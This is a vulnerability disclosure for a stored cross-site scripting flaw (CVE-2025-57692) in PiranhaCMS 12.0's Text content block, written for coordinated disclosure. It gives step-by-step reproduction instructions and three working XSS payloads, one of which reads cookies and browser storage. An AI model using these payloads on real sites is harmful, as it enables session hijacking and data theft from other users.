Cross site scripting in - PiranhaCMS 12.0

CVE-2025-57692
CVSS: 6.8

A vulnerability allowing attackers to execute arbitrary code via unsanitized input.

PiranhaCMS 12.0
Title: Cross site scripting in -
CVE ID: CVE-2025-57692
CVSS: 6.8
Disclosure Date: 9/26/2025
Status: published
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

About Responsible Disclosure

All vulnerabilities I discover are handled through a responsible and coordinated disclosure process. Before any public release, each finding is privately reported to the appropriate vendor, maintainer, or security team to allow sufficient time for verification and remediation. My goal is to ensure that vulnerabilities are addressed effectively and that users remain protected throughout the disclosure lifecycle. I work closely with development teams to validate fixes, provide technical details, and confirm resolution whenever possible. In cases where no fix is issued or the vendor remains unresponsive after multiple contact attempts, the disclosure proceeds in accordance with established coordinated disclosure timelines and ethical reporting standards. CVE identifiers are reserved and published prior to any public disclosure to maintain transparency and integrity in the reporting process. This approach reflects my belief that cybersecurity research should strengthen, not disrupt, the ecosystem, fostering trust, accountability, and resilience across the global security community.

Step-By-Step CVE Process

Summary

Piranha CMS 12.0 contains a stored cross-site scripting (XSS) vulnerability affecting the “Text” content block used in both Standard Page and Standard Archive Page types. When adding text content via the page editor, user-supplied HTML is not properly sanitized. An authenticated user can inject JavaScript payloads that are saved with the page content. These scripts are executed immediately upon save and every time the page is previewed or accessed, resulting in persistent XSS. This presents a serious risk for shared admin environments and can lead to account compromise or unauthorized data access.

Details

Vendor:
https://piranhacms.org
https://github.com/PiranhaCMS/piranha.core

Affected Product:
Piranha CMS version 12.0
https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0

Affected Component:
Pages → Standard Page / Standard Archive → Content Block → Text
Path: /manager/pages.



Step 1

Log in to the Piranha CMS admin panel at /manager/login

Step 2

Navigate to the Pages section

Step 3

Click “Add Page” and choose either Standard Page or Standard Archive.

Step 4

Enter a page title (e.g., XSS-Test)

Step 5

Click the [+] button and select “Text” under “Content”



Step 6

In the text input area, paste one of the following payloads:

Payload A

<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />

Payload B

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C


<details open ontoggle=alert('XSS')>Click</details>



Step 7

Click Save, then click Preview.

Boom, it executes again. Anyone who accesses the page triggers the XSS.

Impact

Persistent (Stored) Cross-Site Scripting (XSS): Injected scripts are saved as part of the page content.
Automatic Execution: Payloads execute every time the page is accessed, previewed, or viewed by any user.
Session Compromise: It can lead to session hijacking or theft of sensitive data such as cookies, tokens, or local/session storage.
Privilege Abuse: Enables malicious authenticated users to target other admins or editors, escalating access or impersonating users.
Multi-Page Exposure: Affects both Standard Pages and Standard Archive Pages, increasing the overall attack surface.